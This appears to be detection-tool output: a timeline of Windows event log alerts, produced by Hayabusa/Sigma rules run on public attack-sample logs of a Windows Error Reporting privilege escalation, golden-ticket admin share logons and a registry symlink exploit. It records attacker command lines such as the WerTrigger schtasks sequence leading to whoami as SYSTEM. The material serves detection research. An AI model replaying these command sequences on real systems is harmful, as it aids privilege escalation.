+2020-08-12 22:05:36.555 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x41c24 | PID: 5128 | PGUID: 747F3D96-E920-5F33-0000-001043920A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:05:38.260 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\cmd.exe /c reg query ""HKLM\Software\WOW6432Node\Npcap"" /ve 2>nul | find ""REG_SZ"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\SYSTEM32\cmd.exe /c """"C:\Program Files\Npcap\CheckStatus.bat"""" | LID: 0x3e7 | PID: 6952 | PGUID: 747F3D96-E922-5F33-0000-00107A2B0B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:05:38.260 +09:00,MSEDGEWIN10,1,low,Disc,Redirect Output in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:05:45.570 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\Explorer.EXE | Tgt Process: C:\Program Files (x86)\FileZilla Server\FileZilla Server Interface.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 5144 | Src PGUID: 747F3D96-E914-5F33-0000-001009990500 | Tgt PID: 7480 | Tgt PGUID: 747F3D96-E928-5F33-0000-0010B8330D00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:06:00.737 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\cmd.exe /c rmdir /s/q C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e > nul 2>&1 | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: WerTrigger.exe | LID: 0x41c24 | PID: 7836 | PGUID: 747F3D96-E938-5F33-0000-00101CA50E00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:06:00.737 +09:00,MSEDGEWIN10,1,high,,Parent in Public Folder Suspicious Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_public_folder_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:06:00.737 +09:00,MSEDGEWIN10,1,low,Evas,Windows Cmd Delete File,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmd_delete.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:06:00.737 +09:00,MSEDGEWIN10,1,low,Disc,Redirect Output in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:06:01.637 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\cmd.exe /c mkdir,C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: WerTrigger.exe | LID: 0x41c24 | PID: 7852 | PGUID: 747F3D96-E939-5F33-0000-0010ACAB0E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:06:01.637 +09:00,MSEDGEWIN10,1,high,,Parent in Public Folder Suspicious Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_public_folder_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:06:02.552 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\cmd.exe /c copy Report.wer C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e > nul 2>&1 | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: WerTrigger.exe | LID: 0x41c24 | PID: 7868 | PGUID: 747F3D96-E93A-5F33-0000-001014B30E00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:06:02.552 +09:00,MSEDGEWIN10,1,high,,Parent in Public Folder Suspicious Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_public_folder_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:06:02.552 +09:00,MSEDGEWIN10,1,low,Disc,Redirect Output in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:06:03.487 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\cmd.exe /c schtasks /run /TN ""Microsoft\Windows\Windows Error Reporting\QueueReporting"" > nul 2>&1 | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: WerTrigger.exe | LID: 0x41c24 | PID: 7888 | PGUID: 747F3D96-E93B-5F33-0000-0010C1B40E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:06:03.487 +09:00,MSEDGEWIN10,1,high,,Parent in Public Folder Suspicious Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_public_folder_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:06:03.487 +09:00,MSEDGEWIN10,1,low,Disc,Redirect Output in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:06:04.075 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\wermgr.exe -upload | LID: 0x3e7 | PID: 8032 | PGUID: 747F3D96-E93C-5F33-0000-0010A6F00E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:06:08.143 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x3e7 | PID: 7460 | PGUID: 747F3D96-E940-5F33-0000-001039310F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:06:08.143 +09:00,MSEDGEWIN10,1,low,Disc,Local Accounts Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:06:08.143 +09:00,MSEDGEWIN10,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,../hayabusa-rules/sigma/process_creation/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:06:08.143 +09:00,MSEDGEWIN10,1,medium,Disc,Whoami Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-21 00:35:28.503 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: hack-admu-test1 | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.23.9 | LID: 0x2275e86d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx
+2020-08-21 00:36:32.382 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.23.9 | LID: 0x2276a30d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx
+2020-08-21 00:36:32.391 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.23.9 | LID: 0x2276a30d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx
+2020-08-21 00:37:06.186 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.23.9 | LID: 0x2276ac17,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx
+2020-08-21 00:37:14.331 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.23.9 | LID: 0x2276ac17,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx
+2020-08-21 00:37:17.039 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.23.9 | LID: 0x2276b0af,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx
+2020-08-21 00:37:35.319 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.23.9 | LID: 0x2276b0af,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx
+2020-08-21 00:37:35.773 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: JUMP01$ | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.23.9 | LID: 0x2276b890,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx
+2020-08-21 00:38:23.185 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: not_existing_user | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.23.9 | LID: 0x2276d109,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5140-ADMIN$ share connection with Golden ticket.evtx
+2020-08-21 00:39:15.820 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.23.9 | LID: 0x2276ac17,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5140-ADMIN$ share connection with Golden ticket.evtx
+2020-08-21 00:41:58.884 +09:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: not_existing_user | Computer: - | IP Addr: 10.23.23.9 | LID: 0x119b90e2,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx
+2020-08-21 00:42:54.177 +09:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x119b9a72,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx
+2020-08-21 00:42:54.177 +09:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x119b9a8f,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx
+2020-08-21 00:42:54.193 +09:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x119b9aa3,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx
+2020-08-21 00:42:54.193 +09:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x119b9ab2,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx
+2020-08-21 00:42:55.188 +09:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x119b9b27,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx
+2020-08-21 00:43:04.967 +09:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x119b9e04,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx
+2020-08-21 00:43:36.582 +09:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x119ba401,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx
+2020-08-21 00:43:36.582 +09:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x119ba414,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx
+2020-08-21 00:43:36.582 +09:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x119ba427,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx
+2020-08-25 18:58:51.434 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\{17A6A947-B905-4D30-88C9-B63C603DA134}.3.ver0x0000000000000001.db | Process: C:\Windows\system32\LogonUI.exe | PID: 8500 | PGUID: 747F3D96-E0DA-5F44-0000-0010B3299600,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx
+2020-08-25 19:02:32.697 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\pagefile.sys | Process: C:\Windows\System32\smss.exe | PID: 308 | PGUID: 747F3D96-6039-5F45-0000-00107B2F0000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx
+2020-08-25 19:02:32.701 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\swapfile.sys | Process: C:\Windows\System32\smss.exe | PID: 308 | PGUID: 747F3D96-6039-5F45-0000-00107B2F0000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx
+2020-08-25 19:07:58.690 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\V4Dirs\7C5CC166-44D2-46E6-93CB-3C4165330D89 | Process: C:\Windows\System32\spoolsv.exe | PID: 2576 | PGUID: 747F3D96-E1B3-5F44-0000-001061BC0100,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx
+2020-08-25 19:07:58.702 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\V4Dirs\7C5CC166-44D2-46E6-93CB-3C4165330D89\merged.gpd | Process: C:\Windows\System32\spoolsv.exe | PID: 2576 | PGUID: 747F3D96-E1B3-5F44-0000-001061BC0100,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx
+2020-08-25 19:07:58.704 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\V4Dirs\7C5CC166-44D2-46E6-93CB-3C4165330D89\pdc.xml | Process: C:\Windows\System32\spoolsv.exe | PID: 2576 | PGUID: 747F3D96-E1B3-5F44-0000-001061BC0100,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx
+2020-08-25 19:07:58.710 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\V4Dirs\7C5CC166-44D2-46E6-93CB-3C4165330D89\device_bidi.gpd | Process: C:\Windows\System32\spoolsv.exe | PID: 2576 | PGUID: 747F3D96-E1B3-5F44-0000-001061BC0100,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx
+2020-08-25 19:07:58.719 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\V4Dirs\7C5CC166-44D2-46E6-93CB-3C4165330D89\5b120a24.BUD | Process: C:\Windows\System32\spoolsv.exe | PID: 2576 | PGUID: 747F3D96-E1B3-5F44-0000-001061BC0100,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx
+2020-08-25 19:08:05.763 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\Desktop\Debug\ntuser.man | Process: C:\Windows\Explorer.EXE | PID: 4192 | PGUID: 747F3D96-E2A0-5F44-0000-0010B5BA1B00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx
+2020-08-25 19:08:05.770 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\Desktop\Debug\ntuser.man.LOG1 | Process: C:\Windows\Explorer.EXE | PID: 4192 | PGUID: 747F3D96-E2A0-5F44-0000-0010B5BA1B00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx
+2020-08-25 19:08:05.772 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\Desktop\Debug\ntuser.man.LOG2 | Process: C:\Windows\Explorer.EXE | PID: 4192 | PGUID: 747F3D96-E2A0-5F44-0000-0010B5BA1B00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx
+2020-08-25 19:08:05.776 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\Desktop\Debug\ntuser.man{f9a54a1d-9fa5-11ea-ac3f-00155d0a720b}.TM.blf | Process: C:\Windows\Explorer.EXE | PID: 4192 | PGUID: 747F3D96-E2A0-5F44-0000-0010B5BA1B00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx
+2020-08-25 19:08:05.780 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\Desktop\Debug\ntuser.man{f9a54a1d-9fa5-11ea-ac3f-00155d0a720b}.TMContainer00000000000000000001.regtrans-ms | Process: C:\Windows\Explorer.EXE | PID: 4192 | PGUID: 747F3D96-E2A0-5F44-0000-0010B5BA1B00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx
+2020-08-25 19:08:05.787 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\Desktop\Debug\ntuser.man{f9a54a1d-9fa5-11ea-ac3f-00155d0a720b}.TMContainer00000000000000000002.regtrans-ms | Process: C:\Windows\Explorer.EXE | PID: 4192 | PGUID: 747F3D96-E2A0-5F44-0000-0010B5BA1B00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx
+2020-08-25 19:08:37.398 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\ntuser.man | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx
+2020-08-25 19:08:37.401 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\ntuser.man.LOG1 | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx
+2020-08-25 19:08:37.401 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\ntuser.man.LOG2 | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx
+2020-08-25 19:08:37.401 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\ntuser.man{f9a54a1d-9fa5-11ea-ac3f-00155d0a720b}.TM.blf | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx
+2020-08-25 19:08:37.401 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\ntuser.man{f9a54a1d-9fa5-11ea-ac3f-00155d0a720b}.TMContainer00000000000000000001.regtrans-ms | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx
+2020-08-25 19:08:37.418 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\ntuser.man{f9a54a1d-9fa5-11ea-ac3f-00155d0a720b}.TMContainer00000000000000000002.regtrans-ms | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx
+2020-08-25 19:08:37.594 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\ntuser.man{f9a54a1c-9fa5-11ea-ac3f-00155d0a720b}.TxR.blf | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx
+2020-08-25 19:08:37.610 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\ntuser.man{f9a54a1c-9fa5-11ea-ac3f-00155d0a720b}.TxR.0.regtrans-ms | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx
